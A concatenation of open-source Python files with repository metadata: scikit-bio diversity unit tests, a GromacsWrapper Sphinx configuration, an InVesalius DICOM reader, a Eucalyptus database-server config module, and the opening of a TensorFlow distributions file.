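# indexed by sample id. For example, under those assumptions:
#
#   obs = alpha_diversity('observed_otus', [[1, 3, 0], [0, 2, 4]],
#                         ids=['A', 'B'])
#   # obs['A'] == 2 and obs['B'] == 2 (number of non-zero OTUs per sample)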
class BetaDiversityTests(TestCase):
def setUp(self):
self.table1 = [[1, 5],
[2, 3],
[0, 1]]
self.sids1 = list('ABC')
self.tree1 = TreeNode.read(io.StringIO(
'((O1:0.25, O2:0.50):0.25, O3:0.75)root;'))
self.oids1 = ['O1', 'O2']
self.table2 = [[23, 64, 14, 0, 0, 3, 1],
[0, 3, 35, 42, 0, 12, 1],
[0, 5, 5, 0, 40, 40, 0],
[44, 35, 9, 0, 1, 0, 0],
[0, 2, 8, 0, 35, 45, 1],
[0, 0, 25, 35, 0, 19, 0]]
self.sids2 = list('ABCDEF')
def test_invalid_input(self):
# number of ids doesn't match the number of samples
error_msg = ("Number of rows")
with self.assertRaisesRegex(ValueError, error_msg):
beta_diversity(self.table1, list('AB'), 'euclidean')
# unknown metric provided
error_msg = "not-a-metric"
with self.assertRaisesRegex(ValueError, error_msg):
beta_diversity('not-a-metric', self.table1)
# 3-D list provided as input
error_msg = ("Only 1-D and 2-D")
with self.assertRaisesRegex(ValueError, error_msg):
beta_diversity('euclidean', [[[43]]])
# negative counts
error_msg = "negative values."
with self.assertRaisesRegex(ValueError, error_msg):
beta_diversity('euclidean', [[0, 1, 3, 4], [0, 3, -12, 42]])
with self.assertRaisesRegex(ValueError, error_msg):
beta_diversity('euclidean', [[0, 1, 3, -4], [0, 3, 12, 42]])
# additional kwargs
error_msg = ("'not_a_real_kwarg'")
with self.assertRaisesRegex(TypeError, error_msg):
beta_diversity('euclidean', [[0, 1, 3], [0, 3, 12]],
not_a_real_kwarg=42.0)
with self.assertRaisesRegex(TypeError, error_msg):
beta_diversity('unweighted_unifrac', [[0, 1, 3], [0, 3, 12]],
not_a_real_kwarg=42.0, tree=self.tree1,
otu_ids=['O1', 'O2', 'O3'])
with self.assertRaisesRegex(TypeError, error_msg):
beta_diversity('weighted_unifrac', [[0, 1, 3], [0, 3, 12]],
not_a_real_kwarg=42.0, tree=self.tree1,
otu_ids=['O1', 'O2', 'O3'])
with self.assertRaisesRegex(TypeError, error_msg):
beta_diversity(weighted_unifrac, [[0, 1, 3], [0, 3, 12]],
not_a_real_kwarg=42.0, tree=self.tree1,
otu_ids=['O1', 'O2', 'O3'])
def test_invalid_input_phylogenetic(self):
# otu_ids not provided
self.assertRaises(ValueError, beta_diversity, 'weighted_unifrac',
self.table1, list('ABC'), tree=self.tree1)
self.assertRaises(ValueError, beta_diversity, 'unweighted_unifrac',
self.table1, list('ABC'), tree=self.tree1)
# tree not provided
self.assertRaises(ValueError, beta_diversity, 'weighted_unifrac',
self.table1, list('ABC'), otu_ids=self.oids1)
self.assertRaises(ValueError, beta_diversity, 'unweighted_unifrac',
self.table1, list('ABC'), otu_ids=self.oids1)
# tree has duplicated tip ids
t = TreeNode.read(
io.StringIO(
'(((((OTU2:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU5:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(DuplicateNodeError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(DuplicateNodeError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
# unrooted tree as input
t = TreeNode.read(io.StringIO('((OTU1:0.1, OTU2:0.2):0.3, OTU3:0.5,'
'OTU4:0.7);'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(ValueError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
# otu_ids has duplicated ids
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU2:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU2']
self.assertRaises(ValueError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(ValueError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
# count and OTU vectors are not equal length
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU2:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2']
self.assertRaises(ValueError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(ValueError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU2:0.75):1.25):0.0)root;'))
counts = [1, 2]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(ValueError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
# tree with no branch lengths
t = TreeNode.read(
io.StringIO('((((OTU1,OTU2),OTU3)),(OTU4,OTU5));'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(ValueError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
# tree missing some branch lengths
t = TreeNode.read(
io.StringIO('(((((OTU1,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU5:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(ValueError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
# some otu_ids not present in tree
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU5:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU42']
self.assertRaises(MissingNodeError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(MissingNodeError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
def test_empty(self):
# array of empty vectors
actual = beta_diversity('euclidean',
np.array([[], []], dtype=np.int64),
ids=['a', 'b'])
expected_dm = DistanceMatrix([[0.0, 0.0], [0.0, 0.0]], ['a', 'b'])
npt.assert_array_equal(actual, expected_dm)
actual = beta_diversity('unweighted_unifrac',
np.array([[], []], dtype=np.int64),
ids=['a', 'b'], tree=self.tree1, otu_ids=[])
expected_dm = DistanceMatrix([[0.0, 0.0], [0.0, 0.0]], ['a', 'b'])
self.assertEqual(actual, expected_dm)
def test_input_types(self):
actual_array = beta_diversity('euclidean',
np.array([[1, 5], [2, 3]]),
ids=['a', 'b'])
actual_list = beta_diversity('euclidean',
[[1, 5], [2, 3]], ids=['a', 'b'])
self.assertEqual(actual_array, actual_list)
def test_euclidean(self):
# TODO: update npt.assert_almost_equal calls to use DistanceMatrix
# near-equality testing when that support is available
actual_dm = beta_diversity('euclidean', self.table1, self.sids1)
self.assertEqual(actual_dm.shape, (3, 3))
npt.assert_almost_equal(actual_dm['A', 'A'], 0.0)
npt.assert_almost_equal(actual_dm['B', 'B'], 0.0)
npt.assert_almost_equal(actual_dm['C', 'C'], 0.0)
npt.assert_almost_equal(actual_dm['A', 'B'], 2.23606798)
npt.assert_almost_equal(actual_dm['B', 'A'], 2.23606798)
npt.assert_almost_equal(actual_dm['A', 'C'], 4.12310563)
npt.assert_almost_equal(actual_dm['C', 'A'], 4.12310563)
npt.assert_almost_equal(actual_dm['B', 'C'], 2.82842712)
npt.assert_almost_equal(actual_dm['C', 'B'], 2.82842712)
actual_dm = beta_diversity('euclidean', self.table2, self.sids2)
expected_data = [
[0., 80.8455317, 84.0297566, 36.3042697, 86.0116271, 78.9176786],
[80.8455317, 0., 71.0844568, 74.4714710, 69.3397433, 14.422205],
[84.0297566, 71.0844568, 0., 77.2851861, 8.3066238, 60.7536007],
[36.3042697, 74.4714710, 77.2851861, 0., 78.7908624, 70.7389567],
[86.0116271, 69.3397433, 8.3066238, 78.7908624, 0., 58.4807660],
[78.9176786, 14.422205, 60.7536007, 70.7389567, 58.4807660, 0.]]
expected_dm = DistanceMatrix(expected_data, self.sids2)
for id1 in self.sids2:
for id2 in self.sids2:
npt.assert_almost_equal(actual_dm[id1, id2],
expected_dm[id1, id2], 6)
def test_braycurtis(self):
# TODO: update npt.assert_almost_equal calls to use DistanceMatrix
# near-equality testing when that support is available
actual_dm = beta_diversity('braycurtis', self.table1, self.sids1)
self.assertEqual(actual_dm.shape, (3, 3))
npt.assert_almost_equal(actual_dm['A', 'A'], 0.0)
npt.assert_almost_equal(actual_dm['B', 'B'], 0.0)
npt.assert_almost_equal(actual_dm['C', 'C'], 0.0)
npt.assert_almost_equal(actual_dm['A', 'B'], 0.27272727)
npt.assert_almost_equal(actual_dm['B', 'A'], 0.27272727)
npt.assert_almost_equal(actual_dm['A', 'C'], 0.71428571)
npt.assert_almost_equal(actual_dm['C', 'A'], 0.71428571)
npt.assert_almost_equal(actual_dm['B', 'C'], 0.66666667)
npt.assert_almost_equal(actual_dm['C', 'B'], 0.66666667)
actual_dm = beta_diversity('braycurtis', self.table2, self.sids2)
expected_data = [
[0., 0.78787879, 0.86666667, 0.30927835, 0.85714286, 0.81521739],
[0.78787879, 0., 0.78142077, 0.86813187, 0.75, 0.1627907],
[0.86666667, 0.78142077, 0., 0.87709497, 0.09392265, 0.71597633],
[0.30927835, 0.86813187, 0.87709497, 0., 0.87777778, 0.89285714],
[0.85714286, 0.75, 0.09392265, 0.87777778, 0., 0.68235294],
[0.81521739, 0.1627907, 0.71597633, 0.89285714, 0.68235294, 0.]]
expected_dm = DistanceMatrix(expected_data, self.sids2)
for id1 in self.sids2:
for id2 in self.sids2:
npt.assert_almost_equal(actual_dm[id1, id2],
expected_dm[id1, id2], 6)
def test_unweighted_unifrac(self):
# TODO: update npt.assert_almost_equal calls to use DistanceMatrix
# near-equality testing when that support is available
# expected values calculated by hand
dm1 = beta_diversity('unweighted_unifrac', self.table1, self.sids1,
otu_ids=self.oids1, tree=self.tree1)
dm2 = beta_diversity(unweighted_unifrac, self.table1, self.sids1,
otu_ids=self.oids1, tree=self.tree1)
self.assertEqual(dm1.shape, (3, 3))
self.assertEqual(dm1, dm2)
expected_data = [[0.0, 0.0, 0.25],
[0.0, 0.0, 0.25],
[0.25, 0.25, 0.0]]
expected_dm = DistanceMatrix(expected_data, ids=self.sids1)
for id1 in self.sids1:
for id2 in self.sids1:
npt.assert_almost_equal(dm1[id1, id2],
expected_dm[id1, id2], 6)
def test_weighted_unifrac(self):
# TODO: update npt.assert_almost_equal calls to use DistanceMatrix
# near-equality testing when that support is available
# expected values calculated by hand
dm1 = beta_diversity('weighted_unifrac', self.table1, self.sids1,
otu_ids=self.oids1, tree=self.tree1)
dm2 = beta_diversity(weighted_unifrac, self.table1, self.sids1,
otu_ids=self.oids1, tree=self.tree1)
self.assertEqual(dm1.shape, (3, 3))
self.assertEqual(dm1, dm2)
expected_data = [
[0.0, 0.1750000, 0.12499999],
[0.1750000, 0.0, 0.3000000],
[0.12499999, 0.3000000, 0.0]]
expected_dm = DistanceMatrix(expected_data, ids=self.sids1)
for id1 in self.sids1:
for id2 in self.sids1:
npt.assert_almost_equal(dm1[id1, id2],
expected_dm[id1, id2], 6)
def test_weighted_unifrac_normalized(self):
# TODO: update npt.assert_almost_equal calls to use DistanceMatrix
# near-equality testing when that support is available
# expected values calculated by hand
dm1 = beta_diversity('weighted_unifrac', self.table1, self.sids1,
otu_ids=self.oids1, tree=self.tree1,
normalized=True)
dm2 = beta_diversity(weighted_unifrac, self.table1, self.sids1,
otu_ids=self.oids1, tree=self.tree1,
normalized=True)
self.assertEqual(dm1.shape, (3, 3))
self.assertEqual(dm1, dm2)
expected_data = [
[0.0, 0.128834, 0.085714],
[0.128834, 0.0, 0.2142857],
[0.085714, 0.2142857, 0.0]]
expected_dm = DistanceMatrix(expected_data, ids=self.sids1)
for id1 in self.sids1:
for id2 in self.sids1:
npt.assert_almost_equal(dm1[id1, id2],
expected_dm[id1, id2], 6)
def test_scipy_kwargs(self):
# confirm that p can be passed to SciPy's minkowski, and that it
# gives a different result than not passing it (the off-diagonal
# entries are not equal).
dm1 = beta_diversity('minkowski', self.table1, self.sids1)
dm2 = beta_diversity('minkowski', self.table1, self.sids1, p=42.0)
for id1 in self.sids1:
for id2 in self.sids1:
if id1 != id2:
self.assertNotEqual(dm1[id1, id2], dm2[id1, id2])
def test_alt_pairwise_func(self):
# confirm that pairwise_func is actually being used
def not_a_real_pdist(counts, metric):
return [[0.0, 42.0], [42.0, 0.0]]
dm1 = beta_diversity('unweighted_unifrac', self.table1,
otu_ids=self.oids1, tree=self.tree1,
pairwise_func=not_a_real_pdist)
expected = DistanceMatrix([[0.0, 42.0], [42.0, 0.0]])
self.assertEqual(dm1, expected)
dm1 = beta_diversity('weighted_unifrac', self.table1,
otu_ids=self.oids1, tree=self.tree1,
pairwise_func=not_a_real_pdist)
expected = DistanceMatrix([[0.0, 42.0], [42.0, 0.0]])
self.assertEqual(dm1, expected)
dm1 = beta_diversity(unweighted_unifrac, self.table1,
otu_ids=self.oids1, tree=self.tree1,
pairwise_func=not_a_real_pdist)
expected = DistanceMatrix([[0.0, 42.0], [42.0, 0.0]])
self.assertEqual(dm1, expected)
dm1 = beta_diversity("euclidean", self.table1,
pairwise_func=not_a_real_pdist)
expected = DistanceMatrix([[0.0, 42.0], [42.0, 0.0]])
self.assertEqual(dm1, expected)
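# Hedged usage sketch (not part of this test suite): beta_diversity returns a
# skbio DistanceMatrix; the phylogenetic metrics additionally require `tree`
# and `otu_ids`. For example:
#
#   dm = beta_diversity('braycurtis', [[1, 5], [2, 3]], ids=['a', 'b'])
#   # dm['a', 'b'] == 3 / 11 == 0.27272727... (sum |u - v| / sum (u + v))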
class MetricGetters(TestCase):
def test_get_alpha_diversity_metrics(self):
m = get_alpha_diversity_metrics()
# basic sanity checks
self.assertTrue('faith_pd' in m)
self.assertTrue('chao1' in m)
def test_get_alpha_diversity_metrics_sorted(self):
m = get_alpha_diversity_metrics()
n = sorted(list(m))
self.assertEqual(m, n)
def test_get_beta_diversity_metrics(self):
m = get_beta_diversity_metrics()
# basic sanity checks
self.assertTrue('unweighted_unifrac' in m)
self.assertTrue('weighted_unifrac' in m)
def test_get_beta_diversity_metrics_sorted(self):
m = get_beta_diversity_metrics()
n = sorted(list(m))
self.assertEqual(m, n)
if __name__ == "__main__":
main()
|
anderspitman/scikit-bio
|
skbio/diversity/tests/test_driver.py
|
Python
|
bsd-3-clause
| 29,199
|
[
"scikit-bio"
] |
f8d4d9258bb40a7f0f44ab156f0ef0771c572d3c213dc032e8343eb7ac46f0e3
|
# -*- coding: utf-8 -*-
#
# GromacsWrapper documentation build configuration file, created by
# sphinx-quickstart on Tue Jun 23 19:38:56 2009.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = u'GromacsWrapper'
copyright = u'2009-2016, The Authors of GromacsWrapper (see AUTHORS)'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# Dynamically calculate the version based on __init__.VERSION.
packageversion = __import__('gromacs').get_version()
# The short X.Y version.
version = '.'.join(packageversion.split('.')[:2])
# The full version, including alpha/beta/rc tags.
release = packageversion
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinxdoc'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = "logos/GromacsWrapper_logo_200x200.png"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = "logos/GromacsWrapper_logo_32x32.ico"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['.static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'GromacsWrapperdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('index', 'GromacsWrapper.tex', u'GromacsWrapper Documentation',
u'Oliver Beckstein', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Options for ext.intersphinx
# ---------------------------
# intersphinx: reference standard lib and RecSQL
# http://sphinx.pocoo.org/latest/ext/intersphinx.html
intersphinx_mapping = {'http://docs.python.org/': None,
'http://docs.scipy.org/doc/numpy/': None,
'http://docs.scipy.org/doc/scipy/reference/': None,
'http://orbeckst.github.com/RecSQL/': None}
# Options for ext.autodoc
# -----------------------
# see http://sphinx.pocoo.org/ext/autodoc.html
# This value selects what content will be inserted into the main body of an autoclass directive.
# "class", "init", "both"
autoclass_content = "both"
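# Hedged illustration (not part of this configuration): with the intersphinx
# mapping above, reST in the documentation can cross-reference the mapped
# projects, e.g. :class:`numpy.ndarray` or :func:`scipy.optimize.minimize`,
# which Sphinx resolves against the remote object inventories at build time.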
|
jandom/GromacsWrapper
|
doc/sphinx/source/conf.py
|
Python
|
gpl-3.0
| 6,620
|
[
"Gromacs"
] |
0e9941eb9367063f6ae488c9bd5fd965920ec102594fb3cbe96e507725ddff94
|
#--------------------------------------------------------------------------
# Software: InVesalius - Software de Reconstrucao 3D de Imagens Medicas
# Copyright: (C) 2001 Centro de Pesquisas Renato Archer
# Homepage: http://www.softwarepublico.gov.br
# Contact: invesalius@cti.gov.br
# License: GNU - GPL 2 (LICENSE.txt/LICENCA.txt)
#--------------------------------------------------------------------------
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; version 2 of the
# License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#--------------------------------------------------------------------------
import os
import Queue
import threading
from multiprocessing import cpu_count
import vtk
import gdcm
import wx.lib.pubsub as ps
import constants as const
import dicom
import dicom_grouper
import session
def ReadDicomGroup(dir_):
patient_group = GetDicomGroups(dir_)
if len(patient_group) > 0:
filelist, dicom, zspacing = SelectLargerDicomGroup(patient_group)
filelist = SortFiles(filelist, dicom)
size = dicom.image.size
bits = dicom.image.bits_allocad
imagedata = CreateImageData(filelist, zspacing, size, bits)
session.Session().project_status = const.NEW_PROJECT
return imagedata, dicom
else:
return False
def SelectLargerDicomGroup(patient_group):
maxslices = 0
for patient in patient_group:
group_list = patient.GetGroups()
for group in group_list:
if group.nslices > maxslices:
maxslices = group.nslices
larger_group = group
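# FIXME: ReadDicomGroup above unpacks (filelist, dicom, zspacing) from this
# return value, but a single DicomGroup is returned here.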
return larger_group
def SortFiles(filelist, dicom):
# Sort slices
# FIXME: sorting crashes on coronal images; needs verification
if (dicom.image.orientation_label != "CORONAL"):
#Organize reversed image
sorter = gdcm.IPPSorter()
sorter.SetComputeZSpacing(True)
sorter.SetZSpacingTolerance(1e-10)
sorter.Sort(filelist)
#Getting organized image
filelist = sorter.GetFilenames()
return filelist
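# Note (hedged, based on the gdcm API as documented): gdcm.IPPSorter orders
# slices by the DICOM Image Position (Patient) tag projected along the slice
# normal; with SetComputeZSpacing(True) the derived inter-slice spacing is
# available afterwards via sorter.GetZSpacing().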
class LoadDicom(threading.Thread):
def __init__(self, grouper, q, l):
threading.Thread.__init__(self)
self.grouper = grouper
self.q = q
self.l = l
def run(self):
grouper = self.grouper
q = self.q
while 1:
filepath = q.get()
if not filepath:
break
parser = dicom.Parser()
if parser.SetFileName(filepath):
dcm = dicom.Dicom()
self.l.acquire()
dcm.SetParser(parser)
grouper.AddFile(dcm)
self.l.release()
def yGetDicomGroups(directory, recursive=True, gui=True):
"""
Yield (counter, nfiles) progress tuples while scanning the given
directory for DICOM files (when gui is True), then yield the
resulting patient groups.
"""
nfiles = 0
# Find total number of files
if recursive:
for dirpath, dirnames, filenames in os.walk(directory):
nfiles += len(filenames)
else:
dirpath, dirnames, filenames = os.walk(directory).next()
nfiles = len(filenames)
counter = 0
grouper = dicom_grouper.DicomPatientGrouper()
q = Queue.Queue()
l = threading.Lock()
threads = []
for i in xrange(cpu_count()):
t = LoadDicom(grouper, q, l)
t.start()
threads.append(t)
# Retrieve only DICOM files, split into groups
if recursive:
for dirpath, dirnames, filenames in os.walk(directory):
for name in filenames:
filepath = os.path.join(dirpath, name)
counter += 1
if gui:
yield (counter,nfiles)
q.put(filepath)
else:
dirpath, dirnames, filenames = os.walk(directory).next()
for name in filenames:
filepath = str(os.path.join(dirpath, name))
counter += 1
if gui:
yield (counter,nfiles)
q.put(filepath)
for t in threads:
q.put(0)
for t in threads:
t.join()
#TODO: Is this commented update necessary?
#grouper.Update()
yield grouper.GetPatientsGroups()
def GetDicomGroups(directory, recursive=True):
return yGetDicomGroups(directory, recursive, gui=False).next()
class ProgressDicomReader:
def __init__(self):
ps.Publisher().subscribe(self.CancelLoad, "Cancel DICOM load")
def CancelLoad(self, evt_pubsub):
self.running = False
self.stopped = True
def SetWindowEvent(self, frame):
self.frame = frame
def SetDirectoryPath(self, path,recursive=True):
self.running = True
self.stopped = False
self.GetDicomGroups(path,recursive)
def UpdateLoadFileProgress(self,cont_progress):
ps.Publisher().sendMessage("Update dicom load", cont_progress)
def EndLoadFile(self, patient_list):
ps.Publisher().sendMessage("End dicom load", patient_list)
def GetDicomGroups(self, path, recursive):
if not const.VTK_WARNING:
log_path = os.path.join(const.LOG_FOLDER, 'vtkoutput.txt')
fow = vtk.vtkFileOutputWindow()
fow.SetFileName(log_path)
ow = vtk.vtkOutputWindow()
ow.SetInstance(fow)
y = yGetDicomGroups(path, recursive)
for value_progress in y:
if not self.running:
break
if isinstance(value_progress, tuple):
self.UpdateLoadFileProgress(value_progress)
else:
self.EndLoadFile(value_progress)
# Necessary in case the user cancels the load,
# to ensure the dicom dialog is closed
if self.stopped:
self.UpdateLoadFileProgress(None)
self.stopped = False
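# Hedged usage sketch (not part of InVesalius): the generator above first
# yields (counter, nfiles) progress tuples and finally the patient groups:
#
#   for value in yGetDicomGroups('/path/to/dicoms', recursive=True):
#       if isinstance(value, tuple):
#           print 'loaded %d of %d files' % value
#       else:
#           patient_groups = value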
|
tatiana/invesalius
|
invesalius/reader/dicom_reader.py
|
Python
|
gpl-2.0
| 6,119
|
[
"VTK"
] |
5716333302593cd26540a4dd2f2da0c9809e65ee2267ed39128cd8bbb7bce369
|
# Copyright 2009-2014 Eucalyptus Systems, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
# Please contact Eucalyptus Systems, Inc., 6755 Hollister Ave., Goleta
# CA 93117, USA or visit http://www.eucalyptus.com/licenses/ if you need
# additional information or have any questions.
#
# Order matters here. We want to make sure we initialize logging before anything
# else happens. We need to initialize the logger that boto will be using.
#
import os
PGSQL_DIR = "/usr/pgsql-9.2/"
LOG_ROOT = "/var/log/eucalyptus-database-server"
RUN_ROOT = "/var/lib/eucalyptus-database-server"
SCRIPT_ROOT = "/usr/libexec/eucalyptus-database-server"
CONF_ROOT = "/etc/eucalyptus-database-server"
PARTITION_SCRIPT = os.path.join(SCRIPT_ROOT, "vol-partition")
PG_RUN_DIR = os.path.join(RUN_ROOT, "pgsql")
PG_DATA_DIR = os.path.join(PG_RUN_DIR, "data")
DB_PASSWORD_FILE = os.path.join(RUN_ROOT, "db_pass.in")
DB_PORT = "5432"
DATABASES = ["eucalyptus_cloudwatch_backend", "eucalyptus_reporting_backend"]
DEFAULT_PID_ROOT = "/var/run/eucalyptus-database-server"
DEFAULT_PIDFILE = os.path.join(DEFAULT_PID_ROOT, "eucadb.pid")
CONFIG_FILE = CONF_ROOT + "/database-server.conf"
pidfile = DEFAULT_PIDFILE
SERVER_CERT_ARN = None
SERVER_CERT_CRT = None
SERVER_CERT_KEY = None
MASTER_PASSWORD_ENCRYPTED = None
VOLUME_ID = None
DEVICE_TO_ATTACH = '/dev/vdc'
user_data_store = {}
def set_pidfile(filename):
global pidfile
global pidroot
pidfile = filename
pidroot = os.path.dirname(pidfile)
def read_config_file():
try:
f = open(CONFIG_FILE)
content = f.read()
f.close()
lines = content.split('\n')
for l in lines:
if len(l.strip()):
kv = l.split('=', 1)
if len(kv) == 2:
user_data_store[kv[0]] = kv[1]
except Exception, err:
raise Exception('Could not read configuration file due to %s' % err)
def get_value(key, optional=False):
if key in user_data_store:
return user_data_store[key]
else:
read_config_file()
if key in user_data_store:
return user_data_store[key]
else:
if not optional:
raise Exception('could not find %s' % key)
else:
return None
def get_compute_service_url():
return get_value('compute_service_url')
def get_euare_service_url():
return get_value('euare_service_url')
def get_ntp_server_url():
return get_value('ntp_server')
def get_volume_id():
return get_value('volume_id')
def get_master_password_encrypted():
return get_value('master_password_encrypted')
def get_server_cert_arn():
return get_value('server_cert_arn')
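# Hedged usage sketch (not part of this module): values are read lazily from
# CONFIG_FILE on the first miss. Given a line 'ntp_server=pool.ntp.org' in
# that file:
#
#   get_ntp_server_url()                     # -> 'pool.ntp.org'
#   get_value('no_such_key', optional=True)  # -> None instead of raising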
|
eucalyptus/eucalyptus-database-server
|
eucadb/config.py
|
Python
|
bsd-2-clause
| 3,228
|
[
"VisIt"
] |
fb7f2d9ccd077e28db50dcf69d5ff79bc4fdc3a01e2de6b9b93e637a1f649588
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base classes for probability distributions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
